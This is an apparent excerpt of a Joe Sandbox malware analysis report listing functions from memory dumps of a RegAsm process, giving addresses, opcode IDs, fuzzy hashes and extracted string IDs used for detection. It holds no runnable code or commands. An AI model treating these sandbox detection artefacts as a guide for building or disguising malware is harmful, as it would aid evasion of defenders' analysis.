                                                                                                                                    • Instruction ID: c962133f3f8c195f3c21e38b3ce94aa0f9697c2bac12431d57d7905612f4608f
                                                                                                                                    • Opcode Fuzzy Hash: 4d5c3999519ac7d1739c708efc1436eb46a335379da378755c4c180d12254d02
                                                                                                                                    • Instruction Fuzzy Hash: 1FE012B5E002199FC780EFBCD50459EB7F4EF49250F504079D65ED7310EA309A118BD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553DD08 Relevance: .0, Instructions: 22COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4804496ec93eb310ca0e9def9860d7033185fd9d08ecc5d92de13238cf2a93b5
                                                                                                                                    • Instruction ID: 0001d43f549d20693fbcaf3ed697cbdf5945818d6de1cbc2dbe5b0423cff542b
                                                                                                                                    • Opcode Fuzzy Hash: 4804496ec93eb310ca0e9def9860d7033185fd9d08ecc5d92de13238cf2a93b5
                                                                                                                                    • Instruction Fuzzy Hash: 74D02B3328D34C4FD305B378B8064147B9BE5C112831409B3E10CCA5BAD9895CC983E2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01695AAC Relevance: .0, Instructions: 22COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 760903f1f3e6c50a54c5cbfe429f7cec2662e2f9e5e320dfb9cc44021571ccfb
                                                                                                                                    • Instruction ID: e390db65220b2a887800ab905761f91b0703b68a3b88a489982b78cf4bb63a11
                                                                                                                                    • Opcode Fuzzy Hash: 760903f1f3e6c50a54c5cbfe429f7cec2662e2f9e5e320dfb9cc44021571ccfb
                                                                                                                                    • Instruction Fuzzy Hash: E3E068B180C385CFEB1A87788C642A87F71EF82210B8845DBC406CF1A5D7388442C702
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05532E6C Relevance: .0, Instructions: 21COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 52cb097e8c35c38e7ea8e545f9cfeff342d40d0a3b1ff4c05d52cff33c66925b
                                                                                                                                    • Instruction ID: bf19ee00562f73c0b61905eca57a31be7cea06920d0c34dcc69ef397a4593f6e
                                                                                                                                    • Opcode Fuzzy Hash: 52cb097e8c35c38e7ea8e545f9cfeff342d40d0a3b1ff4c05d52cff33c66925b
                                                                                                                                    • Instruction Fuzzy Hash: 80E02CABB0C2809BC712A375ACBA171BF60F89201134900DBE08ACEAA6DA009506E320
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169CFF9 Relevance: .0, Instructions: 21COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cb8ead4d2c178f7fe4c94ea02bd6bdbeba59536578a170165c90332396457e4f
                                                                                                                                    • Instruction ID: 39e7a620c8747d1679f232b7a259504daef5b8af75b523d76d53516a54d4f76c
                                                                                                                                    • Opcode Fuzzy Hash: cb8ead4d2c178f7fe4c94ea02bd6bdbeba59536578a170165c90332396457e4f
                                                                                                                                    • Instruction Fuzzy Hash: 22E08652F0D6EA0BC792923858542DA5FD29742150B49059DD480DF242C4184E474386
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 055368C0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4c0721056e49d2cde89c16e8e05df7f7204e0f93947b1a4fd9822572f7a4c831
                                                                                                                                    • Instruction ID: 9a308ed408a3bcdd985715649b6125f6556f7cd6c4ffdc34b5e2c5a41b4ed5ee
                                                                                                                                    • Opcode Fuzzy Hash: 4c0721056e49d2cde89c16e8e05df7f7204e0f93947b1a4fd9822572f7a4c831
                                                                                                                                    • Instruction Fuzzy Hash: EDE08C70A42209EFC704EFB8E905A9DBBB9FB44314F1045AAA509A3210DF705F00DBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC8D50 Relevance: .0, Instructions: 20COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6f825183d59bd5a1190d70407590c98052eca2da79a88f0547907a1bc74609f7
                                                                                                                                    • Instruction ID: d122d80ca939b68ac53d9501d740c6a73dfb7aefea9caf7f27ef9350b8b2fce6
                                                                                                                                    • Opcode Fuzzy Hash: 6f825183d59bd5a1190d70407590c98052eca2da79a88f0547907a1bc74609f7
                                                                                                                                    • Instruction Fuzzy Hash: 78D0C2E970A605AFC703537088300C627F1AA92600B264986C220C766EE9299909C7E2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 016947A0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 81e68e99063e81442471512abdb1b8b3b557185b38c3c88c52f790895ab0ba87
                                                                                                                                    • Instruction ID: c2a7c06ab8384431955657813a55742da882f535bf688387724ccc6da553d844
                                                                                                                                    • Opcode Fuzzy Hash: 81e68e99063e81442471512abdb1b8b3b557185b38c3c88c52f790895ab0ba87
                                                                                                                                    • Instruction Fuzzy Hash: 8AD05E3276506113DB0D225CB88A7EE0BA7E7DA761FDA857AE5048BB48CD688C434391
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01699E30 Relevance: .0, Instructions: 20COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7562adc92f6ee4b54368db118188123584898fc4c27aa08c8f249249f352ed96
                                                                                                                                    • Instruction ID: db7530206b4e3a35473e3dc7eb879f56aa2b8fcbaec9e3681d8732a29a60efb9
                                                                                                                                    • Opcode Fuzzy Hash: 7562adc92f6ee4b54368db118188123584898fc4c27aa08c8f249249f352ed96
                                                                                                                                    • Instruction Fuzzy Hash: C2E0C2316116098BE711BB78E8181AD77B5FBC620AF42027AE205AB348DF35D85087D2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0685AC80 Relevance: .0, Instructions: 20COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b2d58637994ace464a7615449a413ff967bf7e76ab6a9138ebf38928097c68bf
                                                                                                                                    • Instruction ID: ca7b5936f93bdd4479b89eb59747a459e7a297f604b86493ecf3d2ff6148feaa
                                                                                                                                    • Opcode Fuzzy Hash: b2d58637994ace464a7615449a413ff967bf7e76ab6a9138ebf38928097c68bf
                                                                                                                                    • Instruction Fuzzy Hash: 32D05E313082395B8A0537A9B4189AE7BEFEAC56A2300042EE70BC7B50DFA55D0687D5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553C610 Relevance: .0, Instructions: 19COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a350909df6a9e9d2e8f0cd331c80649a5c789f6a70f7d3f1571c5ff2f9ee58f4
                                                                                                                                    • Instruction ID: 8d1fa0d8da1839299d94e406761e5652d42307204f953fef2167cce4281fd5be
                                                                                                                                    • Opcode Fuzzy Hash: a350909df6a9e9d2e8f0cd331c80649a5c789f6a70f7d3f1571c5ff2f9ee58f4
                                                                                                                                    • Instruction Fuzzy Hash: B9E09270E4420CAFCB44EFA8D55459DFBF5AB48300F0081A9A819E7354EA345A488F85
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553E230 Relevance: .0, Instructions: 19COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 782a4426e556250be455a3383d8740b7ef5467750371c39a36a7c128da8afade
                                                                                                                                    • Instruction ID: 08fca78c3d7d0d53b5c84cedb0de8e20091986e65abca2333381810926e06177
                                                                                                                                    • Opcode Fuzzy Hash: 782a4426e556250be455a3383d8740b7ef5467750371c39a36a7c128da8afade
                                                                                                                                    • Instruction Fuzzy Hash: 56E0C27574C1405FE7265BA48856A563FE3BBC2301F0D8065E10A8A16CE575A88DCB92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0685B510 Relevance: .0, Instructions: 19COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a0f042260c5ad6a6d5c5e31e93a39cec72ca92bb64de82bc1f56ce523f550da7
                                                                                                                                    • Instruction ID: a081b134cc259c5e0d87f73a6974806816e4328a1836db9dff5de9ee42893855
                                                                                                                                    • Opcode Fuzzy Hash: a0f042260c5ad6a6d5c5e31e93a39cec72ca92bb64de82bc1f56ce523f550da7
                                                                                                                                    • Instruction Fuzzy Hash: B9E07E75D0420CEFCB40EFA4E9449DDBBB9EB48200F1082AAD909A3200EA706B559B80
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0685E210 Relevance: .0, Instructions: 16COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 00ff382badc923c686d6766997417385d9defb4f60637940adfa0b5cbe1e2851
                                                                                                                                    • Instruction ID: 4bbef8dc665f268363947baa3ff80c53a01cb28346b75d0caf9aa90eae48c042
                                                                                                                                    • Opcode Fuzzy Hash: 00ff382badc923c686d6766997417385d9defb4f60637940adfa0b5cbe1e2851
                                                                                                                                    • Instruction Fuzzy Hash: 5BD05E71E0020DFFCB40EFA8E900A6DB7FAEB84204B5041EED909E7710EA716F109B90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05532E48 Relevance: .0, Instructions: 15COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c590be786df10f9bb0b30bd5865e40a637109e8837b4d605de3f5e841366e242
                                                                                                                                    • Instruction ID: 78afac3b0f55b6b12aeb268acfbc59f9755664750eec1fe64a3a3b35f0d3848e
                                                                                                                                    • Opcode Fuzzy Hash: c590be786df10f9bb0b30bd5865e40a637109e8837b4d605de3f5e841366e242
                                                                                                                                    • Instruction Fuzzy Hash: C7D0A9302A41048BE200AB28C489BD033A9EB88214F8180A2E8088BB23DA29EC128901
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553718F Relevance: .0, Instructions: 15COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e8bee6ade77cf6e0283b08a63ca8335ff57686cfae4940b98db505b40d3834c6
                                                                                                                                    • Instruction ID: 739573a28b0ec60030591b158fe2a915e27396cdb057dd7fb5f9a91b5455a9da
                                                                                                                                    • Opcode Fuzzy Hash: e8bee6ade77cf6e0283b08a63ca8335ff57686cfae4940b98db505b40d3834c6
                                                                                                                                    • Instruction Fuzzy Hash: 9CC08CB6EA5008A5CF00DA98E0023FCFB36F78A226F002826C10FB3100C334872482D5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01695A5F Relevance: .0, Instructions: 14COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f01f82e42272a4928122d99bba1de5409ad8c5a1e1bafb3d979dcd7efadcc421
                                                                                                                                    • Instruction ID: 1a45be5d35d09a18189bcc96010e3f327766bf9d25f4cc9afc1a49d2502949da
                                                                                                                                    • Opcode Fuzzy Hash: f01f82e42272a4928122d99bba1de5409ad8c5a1e1bafb3d979dcd7efadcc421
                                                                                                                                    • Instruction Fuzzy Hash: 4AD06770D0431DCBEB19CBA9C8583ECB7B6EF84315F61442AC40AAA294DB75894ACB55
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05537183 Relevance: .0, Instructions: 12COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f5a0d58ec151d93e385a353448dabcdac8e37897a1aee6eb46286fd4b9ad973c
                                                                                                                                    • Instruction ID: fcae40f20e901e9188e6d36c13661ee6d462f39a252b3cba7318d92a8867988a
                                                                                                                                    • Opcode Fuzzy Hash: f5a0d58ec151d93e385a353448dabcdac8e37897a1aee6eb46286fd4b9ad973c
                                                                                                                                    • Instruction Fuzzy Hash: 05B09226F85004958F149998B0020FCAB29E6CA122F003866D60EA2120962186244294
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05533B3B Relevance: .0, Instructions: 12COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1d3306c7572ff661922a1232e513a7ecfed3945ddf5027577635700b42be4095
                                                                                                                                    • Instruction ID: 3e5e11f0d37a639669c51523d66dcf22e05cc162eaf7680538fa7c5ae1788423
                                                                                                                                    • Opcode Fuzzy Hash: 1d3306c7572ff661922a1232e513a7ecfed3945ddf5027577635700b42be4095
                                                                                                                                    • Instruction Fuzzy Hash: B7D0CA7AE00209CB8F00DA84F8864EEF332FAC4220B208262DA19672048235A822CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05534292 Relevance: .0, Instructions: 9COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: df13db8f8bdbbcc6372e37e08d283b43737698594b47651a01af9dd79e3528da
                                                                                                                                    • Instruction ID: 770cd5daa229222e53e94b6f94025a5cfbf112bcb2d1551b11d94b48add69653
                                                                                                                                    • Opcode Fuzzy Hash: df13db8f8bdbbcc6372e37e08d283b43737698594b47651a01af9dd79e3528da
                                                                                                                                    • Instruction Fuzzy Hash: 90C09B7118134087C7055B34C95A79D3735BBC3629FE945DE90114DAD1CA6FC447C711
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05532E58 Relevance: .0, Instructions: 8COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4055f8bebb1f09e3430c6095b42012c1cc66e4952e1761faa242fe6affef8bb3
                                                                                                                                    • Instruction ID: 3bbf454b5b9fc03ef957e261e241749e4bd707ce72a56f356b2931b7ea99cff3
                                                                                                                                    • Opcode Fuzzy Hash: 4055f8bebb1f09e3430c6095b42012c1cc66e4952e1761faa242fe6affef8bb3
                                                                                                                                    • Instruction Fuzzy Hash: 3DC04834260208CFC244DB68E488D60B3E9AB48A18B2180E9E90D8B723CB32F8128A50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553DD18 Relevance: .0, Instructions: 7COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 62edb2f65e802e9276a95de87632364f182bc668686b8229f01f1f1e7bc35a6f
                                                                                                                                    • Instruction ID: 126d30ef314e1823ed760eb7b4b8f768b64b363b50d27216805e67ddee6b8fc5
                                                                                                                                    • Opcode Fuzzy Hash: 62edb2f65e802e9276a95de87632364f182bc668686b8229f01f1f1e7bc35a6f
                                                                                                                                    • Instruction Fuzzy Hash: 41B0123108030D4FC500B764F404D04771ED5406087405620E10C45A39DBE96CCD46C4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 07AC9AA0 Relevance: 6.6, Strings: 5, Instructions: 378COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Hbq$Hbq$Hbq$Hbq$LR^q
                                                                                                                                    • API String ID: 0-890361779
                                                                                                                                    • Opcode ID: 8c3b38cbb8f81e9b17e52c6e5247a1b1669e1f77255e5752453b785d12df727c
                                                                                                                                    • Instruction ID: 5048bcd97a60cbb383762aa5728736daa8970f22d391a12e88ef7b2d9f38e13a
                                                                                                                                    • Opcode Fuzzy Hash: 8c3b38cbb8f81e9b17e52c6e5247a1b1669e1f77255e5752453b785d12df727c
                                                                                                                                    • Instruction Fuzzy Hash: 1CD1D3B0A04256AFCB19DB79C4542BEBBF2EF85300F1484BED056EB295DB38E941C791
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC2272 Relevance: 15.1, Strings: 12, Instructions: 143COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: `Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q
                                                                                                                                    • API String ID: 0-2561617282
                                                                                                                                    • Opcode ID: e3cf2e9580d70082b4751bdf6cbe186a60241d4b3fe552d90417f8885c3c9201
                                                                                                                                    • Instruction ID: 94286228a776d15066facac0964eb9d2406e2dcf89248d00047612b0cba1e448
                                                                                                                                    • Opcode Fuzzy Hash: e3cf2e9580d70082b4751bdf6cbe186a60241d4b3fe552d90417f8885c3c9201
                                                                                                                                    • Instruction Fuzzy Hash: 25512C78E0020F9FEB05EFA4E951BAEB7B2FB90704F104529D6046F398DB716D098B95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC2280 Relevance: 15.1, Strings: 12, Instructions: 140COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: `Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q
                                                                                                                                    • API String ID: 0-2561617282
                                                                                                                                    • Opcode ID: a4b3ab6558869382e125e1dff23841276afa9dd5e4d55dcf1bd3bec8af05d294
                                                                                                                                    • Instruction ID: 952c61fb922a3c9a53d723d8065e2901fbc4dab82a6dc8a9c07dab08ab002ef6
                                                                                                                                    • Opcode Fuzzy Hash: a4b3ab6558869382e125e1dff23841276afa9dd5e4d55dcf1bd3bec8af05d294
                                                                                                                                    • Instruction Fuzzy Hash: C0511C78E4020F9FEB05EFA4E851BAEB7B2FB90704F104529D6046F394DB71AD098B95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC8DBA Relevance: 9.2, Strings: 7, Instructions: 472COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (_^q$(_^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                    • API String ID: 0-2667574237
                                                                                                                                    • Opcode ID: 3abf033b719327cd57c2949c1a129233cdda4e7f6b55ac658fd13c46568a39f4
                                                                                                                                    • Instruction ID: 693d787f615fd0afd36f2a87c503b0d628b1d6b251cd3f4faf930b3e24754c7e
                                                                                                                                    • Opcode Fuzzy Hash: 3abf033b719327cd57c2949c1a129233cdda4e7f6b55ac658fd13c46568a39f4
                                                                                                                                    • Instruction Fuzzy Hash: A0223A74A002099FEB15EFB8D950A9DBBF6FB85300F1085AAD2056B368DF31AD49CF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC8DC8 Relevance: 9.2, Strings: 7, Instructions: 464COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
